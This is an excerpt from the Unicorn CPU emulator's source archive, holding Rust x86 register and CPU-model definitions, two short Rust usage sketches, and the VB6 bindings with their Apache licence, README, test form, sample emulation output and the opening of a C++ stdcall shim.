    R8D = 226, R9D = 227, R10D = 228, R11D = 229, R12D = 230, R13D = 231, R14D = 232, R15D = 233,
    R8W = 234, R9W = 235, R10W = 236, R11W = 237, R12W = 238, R13W = 239, R14W = 240, R15W = 241,
    IDTR = 242, GDTR = 243, LDTR = 244, TR = 245, FPCW = 246, FPTAG = 247,
    MSR = 248, MXCSR = 249, FS_BASE = 250, GS_BASE = 251, FLAGS = 252, RFLAGS = 253,
    FIP = 254, FCS = 255, FDP = 256, FDS = 257, FOP = 258, ENDING = 259,
}

impl From<RegisterX86> for i32 {
    fn from(r: RegisterX86) -> Self {
        r as i32
    }
}

#[repr(C)]
#[derive(PartialEq, Debug, Clone, Copy)]
#[allow(clippy::upper_case_acronyms)]
pub enum InsnX86 {
    IN = 218,
    OUT = 500,
    SYSCALL = 699,
    SYSENTER = 700,
    RET = 151,
}

#[repr(C)]
#[derive(PartialEq, Debug, Clone, Copy)]
#[allow(clippy::upper_case_acronyms)]
pub enum InsnSysX86 {
    SYSCALL = InsnX86::SYSCALL as isize,
    SYSENTER = InsnX86::SYSENTER as isize,
}

#[repr(C)]
#[derive(PartialEq, Debug, Clone, Copy)]
pub struct X86Mmr {
    pub selector: u64,
    pub base: u64,
    pub limit: u32,
    pub flags: u32,
}

#[repr(i32)]
#[derive(Debug, Copy, Clone, PartialEq, Eq)]
pub enum X86CpuModel {
    UC_CPU_X86_QEMU64 = 0,
    UC_CPU_X86_PHENOM, UC_CPU_X86_CORE2DUO, UC_CPU_X86_KVM64, UC_CPU_X86_QEMU32,
    UC_CPU_X86_KVM32, UC_CPU_X86_COREDUO, UC_CPU_X86_486, UC_CPU_X86_PENTIUM,
    UC_CPU_X86_PENTIUM2, UC_CPU_X86_PENTIUM3, UC_CPU_X86_ATHLON, UC_CPU_X86_N270,
    UC_CPU_X86_CONROE, UC_CPU_X86_PENRYN, UC_CPU_X86_NEHALEM, UC_CPU_X86_WESTMERE,
    UC_CPU_X86_SANDYBRIDGE, UC_CPU_X86_IVYBRIDGE, UC_CPU_X86_HASWELL, UC_CPU_X86_BROADWELL,
    UC_CPU_X86_SKYLAKE_CLIENT, UC_CPU_X86_SKYLAKE_SERVER, UC_CPU_X86_CASCADELAKE_SERVER,
    UC_CPU_X86_COOPERLAKE, UC_CPU_X86_ICELAKE_CLIENT, UC_CPU_X86_ICELAKE_SERVER,
    UC_CPU_X86_DENVERTON, UC_CPU_X86_SNOWRIDGE, UC_CPU_X86_KNIGHTSMILL,
    UC_CPU_X86_OPTERON_G1, UC_CPU_X86_OPTERON_G2, UC_CPU_X86_OPTERON_G3,
    UC_CPU_X86_OPTERON_G4, UC_CPU_X86_OPTERON_G5, UC_CPU_X86_EPYC,
    UC_CPU_X86_DHYANA, UC_CPU_X86_EPYC_ROME,
}

impl From<X86CpuModel> for i32 {
    fn from(value: X86CpuModel) -> Self {
        value as i32
    }
}

impl From<&X86CpuModel> for i32 {
    fn from(value: &X86CpuModel) -> Self {
        (*value) as i32
    }
}
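Both of these enums cross the FFI boundary as plain integers, so the conversions defined above are the supported way to move between the typed and raw forms. A small sketch, again assuming the items above are in scope:

fn main() -> Result<(), uc_error> {
    // TryFrom<usize> validates a raw architecture id coming from C;
    // unknown ids map to uc_error::ARCH.
    assert_eq!(Arch::try_from(4usize)?, Arch::X86);
    assert_eq!(Arch::try_from(99usize), Err(uc_error::ARCH));

    // Register ids are handed to the C API as i32 via the From impl.
    let regid: i32 = RegisterX86::RIP.into();
    assert_eq!(regid, 41);
    Ok(())
}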
unicorn-2.1.1/bindings/vb6/

unicorn-2.1.1/bindings/vb6/.gitattributes

*.frm eol=crlf
*.bas eol=crlf
*.cls eol=crlf
*.ctl eol=crlf
*.vbp eol=crlf
*.txt eol=crlf
*.cpp eol=crlf
*.tli eol=crlf
*.tlh eol=crlf
*.vcproj eol=crlf
*.sln eol=crlf

unicorn-2.1.1/bindings/vb6/Apache_2.0_License.txt

                              Apache License
                        Version 2.0, January 2004
                     http://www.apache.org/licenses/

TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION

1. Definitions.

"License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document.

"Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License.

"Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity.

"You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License.

"Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files.
"Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. 
You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. 
In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages.

9. Accepting Warranty or Additional Liability.

While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability.

END OF TERMS AND CONDITIONS

APPENDIX: How to apply the Apache License to your work.

To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives.

Copyright [yyyy] [name of copyright owner]

Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

unicorn-2.1.1/bindings/vb6/CMemRegion.cls

VERSION 1.0 CLASS
BEGIN
  MultiUse = -1  'True
  Persistable = 0  'NotPersistable
  DataBindingBehavior = 0  'vbNone
  DataSourceBehavior = 0  'vbNone
  MTSTransactionMode = 0  'NotAnMTSObject
END
Attribute VB_Name = "CMemRegion"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = True
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False

'this is for 32bit address space..
Public address As Long
Public size As Long
Public endsAt As Long
Public perm As Long

Function toString() As String
    toString = "Addr: " & Hex(address) & " Size: " & Hex(size) & " Perm: " & permToString() & " (" & Hex(perm) & ")"
End Function

'Public Enum uc_prot
'    UC_PROT_NONE = 0
'    UC_PROT_READ = 1
'    UC_PROT_WRITE = 2
'    UC_PROT_EXEC = 4
'    UC_PROT_ALL = 7
'End Enum

Function permToString() As String
    If perm = 7 Then
        permToString = "All"
        Exit Function
    End If

    If perm = 0 Then
        permToString = "None"
        Exit Function
    End If

    If (perm And 1) = 1 Then permToString = "Read "
    If (perm And 2) = 2 Then permToString = permToString & "Write "
    If (perm And 4) = 4 Then permToString = permToString & "Exec"
    permToString = Trim(permToString)
End Function

unicorn-2.1.1/bindings/vb6/Form1.frm

VERSION 5.00
Begin VB.Form Form1
   Caption         =   "Form1"
   ClientHeight    =   6720
   ClientLeft      =   60
   ClientTop       =   345
   ClientWidth     =   14220
   LinkTopic       =   "Form1"
   ScaleHeight     =   6720
   ScaleWidth      =   14220
   StartUpPosition =   2  'CenterScreen
   Begin VB.CommandButton Command1
      Caption      =   "Copy"
      Height       =   465
      Left         =   6180
      TabIndex     =   1
      Top          =   6150
      Width        =   1995
   End
   Begin VB.ListBox List1
      BeginProperty Font
         Name          =   "Courier New"
         Size          =   11.25
         Charset       =   0
         Weight        =   400
         Underline     =   0  'False
         Italic        =   0  'False
         Strikethrough =   0  'False
      EndProperty
      Height       =   5925
      Left         =   150
      TabIndex     =   0
      Top          =   120
      Width        =   13965
   End
End
Attribute VB_Name = "Form1"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Option Explicit

'Contributed by: FireEye FLARE team
'Author: David Zimmer <david.zimmer@fireeye.com>, <dzzie@yahoo.com>
'License: Apache 2.0

Public WithEvents uc As ucIntel32
Attribute uc.VB_VarHelpID = -1
Dim hContext As Long

'test sample ported from: (requires unicorn 1.0 for success)
'   https://github.com/unicorn-engine/unicorn/blob/master/tests/unit/test_pc_change.c
'   https://github.com/unicorn-engine/unicorn/issues/210

Private Sub Form_Load()

    Dim ecx As Long, edx As Long
    Dim address As Long, size As Long, endAt As Long
    Dim b() As Byte, c As Collection, mem As CMemRegion

    Me.Visible = True

    'you can set the UNICORN_PATH global variable to load a specific dll; do this before initializing the class
    Set uc = New ucIntel32

    If uc.hadErr Then
        List1.AddItem uc.errMsg
        Exit Sub
    End If

    List1.AddItem "ucvbshim.dll loaded @" & Hex(uc.hLib)
    List1.AddItem "Unicorn version: " & uc.Version
    List1.AddItem "Disassembler available: " & uc.DisasmAvail
    If uc.major < 1 Then List1.AddItem "Change Eip in hook test requires >= v1.x for success"
    List1.AddItem "Unicorn x86 32bit engine handle: " & Hex(uc.uc)

    ' ReDim b(8)   'for clarity in what we are testing..
    ' b(0) = &H41  ' inc ECX @0x1000000
    ' b(1) = &H41  ' inc ECX
    ' b(2) = &H41  ' inc ECX
    ' b(3) = &H41  ' inc ECX @0x1000003
    ' b(4) = &H41  ' inc ECX
    ' b(5) = &H41  ' inc ECX
    '
    ' b(6) = &H42  ' inc EDX @0x1000006
    ' b(7) = &H42  ' inc EDX
    ' #define X86_CODE32_MEM_WRITE "\x89\x0D\xAA\xAA\xAA\xAA\x41\x4a" // mov [0xaaaaaaaa], ecx; INC ecx; DEC edx

    'we mash up two different test cases: first the change-eip-in-hook test, then an invalid memory access.
    'note the format accepted by toBytes() is somewhat forgiving (always use 2-char hex vals though)
    b() = toBytes("4141414141414242cc\x89\x0D\xAA\xAA\xAA\xAA\x41\x4a")

    ecx = 3
    edx = 15
    address = &H1000000
    size = &H200000
    endAt = address + UBound(b) + 1

    If Not uc.mapMem(address, size) Then
        List1.AddItem "Failed to map in 2mb memory " & uc.errMsg
        Exit Sub
    End If

    ' write machine code to be emulated to memory
    If Not uc.writeMem(address, b()) Then
        List1.AddItem "Failed to write code to memory " & uc.errMsg
        Exit Sub
    End If

    List1.AddItem "starts at: " & uc.disasm(address)

    Dim b2() As Byte
    If uc.readMem(address, b2, UBound(b) + 1) Then '+1 because ubound is 0 based..
        List1.AddItem "readMem: " & HexDump(b2, 1)
    End If

    uc.reg32(ecx_r) = ecx
    uc.reg32(edx_r) = edx
    List1.AddItem "start values ECX = " & ecx & " EDX = " & edx

    ' trace all instructions
    uc.addHook hc_code, UC_HOOK_CODE
    uc.addHook hc_memInvalid, UC_HOOK_MEM_READ_UNMAPPED Or UC_HOOK_MEM_WRITE_UNMAPPED
    'uc.removeHook UC_HOOK_MEM_READ_UNMAPPED Or UC_HOOK_MEM_WRITE_UNMAPPED
    uc.addHook hc_int, UC_HOOK_INTR

    List1.AddItem "beginning emulation.."
    If Not uc.startEmu(address, endAt) Then List1.AddItem uc.errMsg

    ecx = uc.reg32(ecx_r)
    edx = uc.reg8(dl_r)

    List1.AddItem "ECX: 6 =? " & ecx
    List1.AddItem "EDX: 17 =? " & edx
    List1.AddItem uc.dumpFlags
    If ecx <> 6 Then List1.AddItem "failed to change eip in hook!"

    ReDim b(100)

    'this will handle mapping and alignment automatically..
    uc.writeBlock &H2001, b(), UC_PROT_READ Or UC_PROT_WRITE

    List1.AddItem "Initilizing sharedMemory with: aabbccddeeff0011223344556677889900"
    sharedMemory() = toBytes("aabbccddeeff0011223344556677889900")
    ReDim Preserve sharedMemory(&H1000) 'must be 4k bytes aligned...

    If Not uc.mapMemPtr(sharedMemory, &H4000, UBound(sharedMemory)) Then
        List1.AddItem "Failed to map in host memory " & uc.errMsg
    Else
        Dim bb As Byte, ii As Integer, ll As Long

        If Not uc.writeByte(&H4001, &H41) Then
            List1.AddItem "Failed to write byte to shared mem"
        Else
            List1.AddItem "Wrote 0x41 to sharedMemory + 1"
            If uc.readByte(&H4001, bb) Then List1.AddItem "readByte = " & Hex(bb)
        End If

        'uc.writeInt &H4001, &H4142
        'If uc.readInt(&H4001, ii) Then List1.AddItem Hex(ii)
        'uc.writeLong &H4001, &H11223344
        'If uc.readLong(&H4001, ll) Then List1.AddItem Hex(ll)

        Erase b2
        If uc.readMem(&H4000, b2, 20) Then
            List1.AddItem "emu read of sharedMemory: " & HexDump(b2, 1)
        Else
            List1.AddItem "Failed to readMem on sharedMemory " & uc.errMsg
        End If

        List1.AddItem "sanity checking host mem: " & HexDump(sharedMemory, 1, , 20)
    End If

    List1.AddItem "Enumerating memory regions..."
    Set c = uc.getMemMap()
    For Each mem In c
        List1.AddItem mem.toString()
    Next

    If hContext <> 0 Then
        List1.AddItem "trying to restore context.."
        If Not uc.restoreContext(hContext) Then List1.AddItem uc.errMsg
        List1.AddItem uc.regDump()
        List1.AddItem "beginning emulation.."
        If Not uc.startEmu(uc.eip, endAt) Then List1.AddItem uc.errMsg
        List1.AddItem uc.regDump()
        List1.AddItem "releasing saved context.."
        If Not uc.freeContext(hContext) Then List1.AddItem uc.errMsg
    End If

    Set mem = c(2)
    If Not uc.changePermissions(mem, UC_PROT_ALL) Then
        List1.AddItem "Failed to change permissions on second alloc " & uc.errMsg
    Else
        List1.AddItem "Changed permissions on second alloc to ALL"
        List1.AddItem "redumping memory regions to check..."
        Set c = uc.getMemMap()
        For Each mem In c
            List1.AddItem mem.toString()
        Next
    End If

    If uc.unMapMem(&H2000) Then
        List1.AddItem "Successfully unmapped new alloc"
    Else
        List1.AddItem "Failed to unmap alloc " & uc.errMsg
    End If

    List1.AddItem "Mem allocs count now: " & uc.getMemMap().count

End Sub

Private Sub Command1_Click()
    Clipboard.Clear
    Clipboard.SetText lbCopy(List1)
End Sub

Private Sub Form_Unload(Cancel As Integer)
    'so the IDE doesn't hang onto the dll and we can recompile in development testing.. if you hit stop this benefit is lost..
    'do not use this in your real code, only for c dll development..
    If uc.hLib <> 0 Then FreeLibrary uc.hLib
End Sub

Private Sub uc_CodeHook(ByVal address As Long, ByVal size As Long)
    List1.AddItem "> " & uc.disasm(address)
    If hContext = 0 And address = &H1000003 Then
        'change the PC to "inc EDX"
        List1.AddItem "changing eip to skip last inc ecx's and saving context..."
        hContext = uc.saveContext()
        If hContext = 0 Then List1.AddItem "Failed to save context " & uc.errMsg
        uc.eip = &H1000006
    End If
End Sub

Private Sub uc_Interrupt(ByVal intno As Long)
    List1.AddItem "Interrupt: " & intno
End Sub

Private Sub uc_InvalidMem(ByVal t As uc_mem_type, ByVal address As Long, ByVal size As Long, ByVal value As Long, continue As Boolean)
    'continue defaults to false so we can ignore it unless we want to continue..
    List1.AddItem "Invalid mem access address: " & Hex(address) & " size: " & Hex(size) & " type: " & memType2str(t)
End Sub

Private Sub uc_MemAccess(ByVal t As uc_mem_type, ByVal address As Long, ByVal size As Long, ByVal value As Long)
    List1.AddItem "mem access: address: " & Hex(address) & " size: " & Hex(size) & " type: " & memType2str(t)
End Sub

unicorn-2.1.1/bindings/vb6/Project1.vbp

Type=Exe
Form=Form1.frm
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\SysWOW64\stdole2.tlb#OLE Automation
Module=uc_def; uc_def.bas
Module=misc; misc.bas
Class=ucIntel32; ucIntel32.cls
Class=CMemRegion; CMemRegion.cls
IconForm="Form1"
Startup="Form1"
HelpFile=""
ExeName32="vb6Test.exe"
Command32=""
Name="Project1"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName="sandsprite"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=-1
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1

[MS Transaction Server]
AutoRefresh=1

[fastBuild]
fullPath=%ap%\vb6Test.exe
unicorn-2.1.1/bindings/vb6/Project1.vbw

Form1 = 39, 35, 1148, 674, , 22, 22, 1090, 631, C
uc_def = 56, 12, 1177, 758,
misc = 44, 44, 1121, 685,
ucIntel32 = 88, 33, 1136, 684,
CMemRegion = 110, 110, 1026, 639,

unicorn-2.1.1/bindings/vb6/README.txt

Unicorn engine bindings for VB6

A sample class for the 32bit x86 emulator is provided.

Contributed by: FireEye FLARE team
Author: David Zimmer <david.zimmer@fireeye.com>, <dzzie@yahoo.com>
License: Apache 2.0

' supported api:
'    ucs_version
'    ucs_arch_supported
'    ucs_open
'    ucs_close
'    uc_reg_write
'    uc_reg_read
'    uc_mem_write
'    UC_MEM_READ
'    uc_emu_start
'    uc_emu_stop
'    ucs_hook_add
'    uc_mem_map
'    uc_hook_del
'    uc_mem_regions
'    uc_mem_map_ptr
'    uc_context_alloc
'    uc_free
'    uc_context_save
'    uc_context_restore
'    uc_mem_unmap
'    uc_mem_protect
'    uc_strerror
'    uc_errno
'
' supported hooks:
'    UC_HOOK_CODE
'    UC_HOOK_BLOCK
'    memory READ/WRITE/FETCH
'    invalid memory access
'    interrupts
'
' bonus:
'    disasm_addr     (conditional compile - uses libdasm)
'    mem_write_block (map and write data, auto handles alignment)
'    get_memMap      (wrapper for uc_mem_regions)

dependencies: (all in same directory, or the unicorn package in %windir%)

    vb6Test.exe
    ucvbshim.dll
    unicorn.dll         \
    libgcc_s_dw2-1.dll   \
    libiconv-2.dll        \__ unicorn package
    libintl-8.dll         /
    libpcre-1.dll        /
    libwinpthread-1.dll /

Notes:

    The C dll was built using VS2008; build notes are included at the top of main.cpp.
    This dll serves as a stdcall shim so VB6 can access the cdecl API and receive
    data from the callbacks.

    Huge thanks to the unicorn and qemu authors, who took on a gigantic task to
    create this library!
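For comparison with the ucs_* shim API listed above, the same kind of setup takes only a few lines against the project's Rust binding, whose constant definitions appear earlier in this archive. This is a hedged sketch: it assumes the `Unicorn` handle type from the crate's lib.rs (not part of this excerpt) and the module paths of the published unicorn-engine crate.

use unicorn_engine::unicorn_const::{Arch, Mode, Permission};
use unicorn_engine::{RegisterX86, Unicorn};

fn main() {
    // Same test bytes as the VB6 sample: six `inc ecx`, two `inc edx`.
    let code = [0x41u8, 0x41, 0x41, 0x41, 0x41, 0x41, 0x42, 0x42];
    let base = 0x100_0000u64;

    let mut emu = Unicorn::new(Arch::X86, Mode::MODE_32).expect("uc_open failed");
    emu.mem_map(base, 0x20_0000, Permission::ALL).expect("uc_mem_map failed");
    emu.mem_write(base, &code).expect("uc_mem_write failed");
    emu.reg_write(RegisterX86::ECX, 3).expect("reg_write failed");
    emu.reg_write(RegisterX86::EDX, 15).expect("reg_write failed");

    emu.emu_start(base, base + code.len() as u64, 0, 0)
        .expect("uc_emu_start failed");

    // Without the PC-changing code hook of the VB6 test, all six incs run.
    assert_eq!(emu.reg_read(RegisterX86::ECX).unwrap(), 9);
    assert_eq!(emu.reg_read(RegisterX86::EDX).unwrap(), 17);
}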
unicorn-2.1.1/bindings/vb6/example_output.txt

ucvbshim.dll loaded @10000000
Unicorn version: 1.0
Disassembler available: True
Unicorn x86 32bit engine handle: 853FD8
starts at: 01000000   41   inc ecx
readMem: 4141414141414242CC890DAAAAAAAA414A
start values ECX = 3 EDX = 15
beginning emulation..
> 01000000   41   inc ecx
> 01000001   41   inc ecx
> 01000002   41   inc ecx
> 01000003   41   inc ecx
changing eip to skip last inc ecx's and saving context...
> 01000006   42   inc edx
> 01000007   42   inc edx
> 01000008   CC   int3
Interrupt: 3
> 01000009   89 0D AA AA AA AA   mov [0xaaaaaaaa],ecx
Invalid mem access address: AAAAAAAA size: 4 type: Unmapped memory is written to
Quit emulation due to WRITE on unmapped memory: uc_emu_start()
ECX: 6 =? 6
EDX: 17 =? 17
EFL 4 P
Initilizing sharedMemory with: aabbccddeeff0011223344556677889900
Wrote 0x41 to sharedMemory + 1
readByte = 41
emu read of sharedMemory: AA41CCDDEEFF0011223344556677889900000000
sanity checking host mem: AA41CCDDEEFF0011223344556677889900000000
Enumerating memory regions...
Addr: 1000000 Size: 200000 Perm: All (7)
Addr: 2000 Size: 1000 Perm: Read Write (3)
Addr: 4000 Size: 1000 Perm: All (7)
trying to restore context..
eax=0 ecx=6 edx=F ebx=0 esp=0 ebp=0 esi=0 edi=0 eip=1000003 eflags=0
EFL 0
beginning emulation..
> 01000003   41   inc ecx
> 01000004   41   inc ecx
> 01000005   41   inc ecx
> 01000006   42   inc edx
> 01000007   42   inc edx
> 01000008   CC   int3
Interrupt: 3
> 01000009   89 0D AA AA AA AA   mov [0xaaaaaaaa],ecx
Invalid mem access address: AAAAAAAA size: 4 type: Unmapped memory is written to
Quit emulation due to WRITE on unmapped memory: uc_emu_start()
eax=0 ecx=9 edx=11 ebx=0 esp=0 ebp=0 esi=0 edi=0 eip=1000009 eflags=4
EFL 4 P
releasing saved context..
Changed permissions on second alloc to ALL
redumping memory regions to check...
Addr: 1000000 Size: 200000 Perm: All (7)
Addr: 2000 Size: 1000 Perm: All (7)
Addr: 4000 Size: 1000 Perm: All (7)
Successfully unmapped new alloc
Mem allocs count now: 2

unicorn-2.1.1/bindings/vb6/main.cpp

/*
    stdcall unicorn engine shim layer for use with VB6 or C#
    code ripped from unicorn_dynload.c

    Contributed by: FireEye FLARE team
    Author:         David Zimmer <david.zimmer@fireeye.com>, <dzzie@yahoo.com>
    License:        Apache 2.0

    Disassembler support can be optionally compiled in using:
    libdasm (c) 2004 - 2006 jt / nologin.org

    this project has been built with vs2008; precompiled binaries with disasm
    support are available here:
        https://github.com/dzzie/libs/tree/master/unicorn_emu
*/

#include <io.h>
#include <windows.h>

#ifdef _WIN64
#error vb6 is 32bit only
#endif

#include <unicorn/unicorn.h>
#pragma comment(lib, "unicorn.lib")

// if you compile with VS2008 you will need to add stdint.h and inttypes.h to
// your compiler include directory. you can find examples here:
//     https://github.com/dzzie/VS_LIBEMU/tree/master/libemu/include

// if you want to include disassembler support:
//   1) install libdasm in your compiler's include directory
//   2) add libdasm.h/.c to the project (drag and drop into VS project explorer)
//   3) remove the comment from the define below
// The vb code detects the changes at runtime.
//#define INCLUDE_DISASM

#ifdef INCLUDE_DISASM
#include <libdasm/libdasm.h>
#endif

#include "msvbvm60.tlh" // so we can use the vb6 collection object

#define EXPORT comment(linker, "/EXPORT:"__FUNCTION__"="__FUNCDNAME__)

enum hookCatagory { hc_code = 0, hc_block = 1, hc_inst = 2, hc_int = 3, hc_mem = 4, hc_memInvalid = 5 };

// tracing UC_HOOK_CODE & UC_HOOK_BLOCK
typedef void(__stdcall *vb_cb_hookcode_t)(uc_engine *uc, uint64_t address, uint32_t size, void *user_data);
vb_cb_hookcode_t vbHookcode = 0;
vb_cb_hookcode_t vbHookBlock = 0;

// hooking memory UC_MEM_READ/WRITE/FETCH
typedef void(__stdcall *vb_cb_hookmem_t)(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data);
vb_cb_hookmem_t vbHookMem = 0;

// invalid memory access UC_MEM_*_UNMAPPED and UC_MEM_*PROT events
typedef bool(__stdcall *vb_cb_eventmem_t)(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data);
vb_cb_eventmem_t vbInvalidMem = 0;

// tracing interrupts for uc_hook_intr()
typedef void(__stdcall *vb_cb_hookintr_t)(uc_engine *uc, uint32_t intno, void *user_data);
vb_cb_hookintr_t vbHookInt = 0;

/*
typedef uint32_t (__stdcall *uc_cb_insn_in_t)(uc_engine *uc, uint32_t port, int size, void *user_data);               // tracing IN instruction of X86
typedef void (__stdcall *uc_cb_insn_out_t)(uc_engine *uc, uint32_t port, int size, uint32_t value, void *user_data);  // tracing OUT instruction of X86
*/

//------------------ [ call back proxies ] -------------------------
static void c_hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data)
{
    if (vbHookcode == 0) return;
    vbHookcode(uc, address, size, user_data);
}

static void c_hook_mem(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data)
{
    if (vbHookMem == 0) return;
    vbHookMem(uc, type, address, size, value, user_data);
}

static bool c_hook_mem_invalid(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data)
{
    if (vbInvalidMem == 0) return false;
    return vbInvalidMem(uc, type, address, size, value, user_data);
}

static void c_hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data)
{
    if (vbHookBlock == 0) return;
    vbHookBlock(uc, address, size, user_data);
}

static void c_hook_intr(uc_engine *uc, uint32_t intno, void *user_data)
{
    if (vbHookInt == 0) return;
    vbHookInt(uc, intno, user_data);
}

/*
static uint32_t hook_in(uc_engine *uc, uint32_t port, int size, void *user_data) { }
static void hook_out(uc_engine *uc, uint32_t port, int size, uint32_t value, void *user_data) { }
*/

//-------------------------------------------------------------
// uc_err uc_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback, void *user_data, uint64_t begin, uint64_t end, ...);
// we need to use a C stub cdecl callback then proxy to the stdcall vb one..
// we could get cute with an asm thunk in vb, but it is not worth the complexity; there are only a couple of them to support..

// cdecl callback to vb stdcall callback for tracing
